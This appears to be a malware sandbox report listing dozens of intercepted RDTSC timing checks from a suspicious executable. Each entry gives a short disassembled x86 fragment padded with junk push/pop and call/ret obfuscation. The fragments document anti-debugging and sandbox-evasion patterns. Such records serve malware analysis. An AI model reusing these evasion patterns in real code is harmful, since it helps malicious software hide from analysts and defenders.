Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 446957 second address: 4469B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 75C169CDh 0x00000012 call 00007FD1807ED54Bh 0x00000017 mov dl, bh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245B3D3h] 0x00000020 jng 00007FD1807ED54Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD1807ED558h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4469B7 second address: 4469BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4469BD second address: 4469D8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD1807ED54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jl 00007FD1807ED546h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467B79 second address: 467B84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467B84 second address: 467B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD1807ED546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 465BCA second address: 465BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4663BB second address: 4663D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4663D1 second address: 4663D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 466534 second address: 46653D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46681F second address: 466825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46697A second address: 466984 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 466984 second address: 466990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 45CEAE second address: 45CEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467761 second address: 467772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 467772 second address: 467797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD1807ED54Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295BB second address: 4295C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295C1 second address: 4295C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295C5 second address: 4295CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295CD second address: 4295D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295D3 second address: 4295D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4295D7 second address: 4295E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD1807ED546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D26A second address: 46D275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD180B5C156h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D275 second address: 46D2A5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD1807ED54Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED551h 0x00000011 jmp 00007FD1807ED54Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D2A5 second address: 46D2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D2AB second address: 46D2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 46D2B1 second address: 46D2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 43537D second address: 435398 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD1807ED553h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 435398 second address: 43539C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47372B second address: 473732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473732 second address: 47373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473A17 second address: 473A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED552h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473A2D second address: 473A33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473D4A second address: 473D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473EFA second address: 473EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473EFE second address: 473F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 473F04 second address: 473F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4775C7 second address: 4775D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477851 second address: 477857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47794C second address: 477950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477FED second address: 477FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477FF2 second address: 47800E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47828A second address: 478297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 478297 second address: 47829B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47829B second address: 4782A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4782A5 second address: 4782A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 478B94 second address: 478BD2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c ja 00007FD180B5C164h 0x00000012 nop 0x00000013 mov dword ptr [ebp+1245A7BFh], esi 0x00000019 push 00000000h 0x0000001b mov esi, dword ptr [ebp+122D2BCBh] 0x00000021 push 00000000h 0x00000023 sub edi, dword ptr [ebp+122D2BEBh] 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 479562 second address: 479566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47A5F7 second address: 47A606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47A606 second address: 47A66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED559h 0x00000009 popad 0x0000000a pop esi 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1BD9h], ecx 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D2CDFh] 0x0000001a push 00000000h 0x0000001c jmp 00007FD1807ED553h 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FD1807ED559h 0x00000027 push eax 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jc 00007FD1807ED546h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47CB88 second address: 47CB93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD180B5C156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47B8CA second address: 47B8CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 43BD85 second address: 43BDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FD180B5C158h 0x0000000b pushad 0x0000000c jmp 00007FD180B5C15Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DEE3 second address: 47DEED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DEED second address: 47DF07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD180B5C15Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC5E second address: 47DC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DF07 second address: 47DF42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1C93h], ebx 0x00000010 push 00000000h 0x00000012 stc 0x00000013 push 00000000h 0x00000015 mov edi, eax 0x00000017 mov edi, dword ptr [ebp+122D2B17h] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FD180B5C15Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC79 second address: 47DC95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DF42 second address: 47DF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC95 second address: 47DC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E94D second address: 47E952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E952 second address: 47E96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E96E second address: 47E9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add dword ptr [ebp+122D30A3h], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD180B5C158h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FD180B5C158h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 jmp 00007FD180B5C164h 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 je 00007FD180B5C15Ch 0x00000056 jl 00007FD180B5C156h 0x0000005c pop eax 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E9EB second address: 47E9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E9EF second address: 47E9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47E9F5 second address: 47E9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD1807ED546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47F41C second address: 47F420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47F420 second address: 47F47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD1807ED552h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D2CD3h] 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2F25h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FD1807ED548h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a mov si, bx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jnc 00007FD1807ED54Ch 0x00000046 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 481EA9 second address: 481EBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FD180B5C156h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4842BE second address: 484377 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FD1807ED557h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FD1807ED548h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D2AAFh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FD1807ED548h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D2C1Bh] 0x00000053 push 00000000h 0x00000055 jo 00007FD1807ED55Ch 0x0000005b pushad 0x0000005c pushad 0x0000005d popad 0x0000005e jmp 00007FD1807ED552h 0x00000063 popad 0x00000064 xchg eax, esi 0x00000065 jmp 00007FD1807ED555h 0x0000006a push eax 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e jo 00007FD1807ED546h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 484377 second address: 48437B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4844E5 second address: 4844EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4844EC second address: 484507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 484507 second address: 48450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4855CB second address: 4855CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871AB second address: 4871B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4855CF second address: 4855E0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871B1 second address: 4871B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871B5 second address: 4871EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jng 00007FD180B5C169h 0x00000013 jmp 00007FD180B5C163h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4871EB second address: 4871EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 488276 second address: 4882E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FD180B5C158h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jnc 00007FD180B5C15Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FD180B5C158h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov bx, ax 0x00000048 mov di, 24E3h 0x0000004c push 00000000h 0x0000004e mov edi, dword ptr [ebp+12463303h] 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007FD180B5C158h 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4873B2 second address: 4873B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48A4DD second address: 48A4E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD180B5C156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48B5DA second address: 48B5DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
